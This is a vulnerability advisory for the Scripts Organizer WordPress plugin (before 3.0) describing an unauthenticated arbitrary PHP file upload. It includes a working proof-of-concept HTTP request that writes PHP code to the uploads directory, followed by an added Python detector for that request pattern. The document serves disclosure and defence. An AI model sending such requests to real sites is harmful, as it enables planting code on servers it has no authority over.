wpexploit | Ovidiu Maghetiu | WPEX-ID:F3B450D2-84CE-4C13-AD6A-B60785DEE7E7
Sep 05, 2022 - 12:00 a.m.

Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload

unauthenticated arbitrary file upload
post
scripts organizer

EPSS: 0.001 (Low)
Percentile: 40.9%

The plugin does not perform capability or CSRF checks in the saveScript AJAX action, which is available to both unauthenticated and authenticated users, and does not validate user input in any way. This could allow unauthenticated users to put arbitrary PHP code in a file.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 295

action=saveScript&php_script=%22%3C%3Fphp+die('test')%3B%22&SCORG_enable_script=1&form_data=post_status%3Dpublish%26post_name%3Dtest%26post_author%3D1%26post_name%3Dtest%26post_ID%3D200%26post_title%3Dtest%26SCORG_enable_script%3D1%26SCORG_trigger_location%3Deverywhere%26SCORG_script_type%3Dphp


The file will be at https://example.com/wp-content/uploads/scripts-organizer/200.php
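
A defender-side check for the request shown above, as an added example that is not part of the original advisory or the plugin's code: it parses a captured admin-ajax.php POST body, flags saveScript calls, and derives the uploads path a responder should inspect. The function names, the availability of request bodies and Cookie headers (for instance from a WAF or proxy audit log), and the nested decoding of form_data are assumptions.

```python
from urllib.parse import parse_qs

# Directory named in the advisory; relative to the WordPress root.
UPLOAD_DIR = "wp-content/uploads/scripts-organizer"

# Constructed sample: the request body from the advisory's proof of concept.
SAMPLE_BODY = (
    "action=saveScript&php_script=%22%3C%3Fphp+die('test')%3B%22"
    "&SCORG_enable_script=1&form_data=post_status%3Dpublish%26post_name%3Dtest"
    "%26post_author%3D1%26post_name%3Dtest%26post_ID%3D200%26post_title%3Dtest"
    "%26SCORG_enable_script%3D1%26SCORG_trigger_location%3Deverywhere"
    "%26SCORG_script_type%3Dphp"
)


def last(fields, key):
    """PHP keeps the last value of a repeated key, so mirror that."""
    return fields.get(key, [""])[-1]


def inspect_ajax_body(body, cookie_header=""):
    """Return a finding for a saveScript call, or None for any other action."""
    outer = parse_qs(body, keep_blank_values=True)
    if last(outer, "action") != "saveScript":
        return None
    # Assumption: form_data is a nested URL-encoded string, as in the sample.
    inner = parse_qs(last(outer, "form_data"), keep_blank_values=True)
    post_id = last(inner, "post_ID")
    script = last(outer, "php_script").lower()
    # Only ASCII digits become a path, so a hostile post_ID cannot redirect
    # the responder's file check.
    numeric = post_id.isascii() and post_id.isdigit()
    return {
        # Cookie presence only; it does not prove the session is valid.
        "unauthenticated": "wordpress_logged_in_" not in cookie_header,
        "script_type": last(inner, "SCORG_script_type"),
        "carries_php": "<?php" in script or "<?=" in script,
        "file_to_check": f"{UPLOAD_DIR}/{post_id}.php" if numeric else None,
    }


if __name__ == "__main__":
    print(inspect_ajax_body(SAMPLE_BODY))
```

A finding with unauthenticated and carries_php both true is the pattern this advisory describes; the file_to_check path is where to look for a written script.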
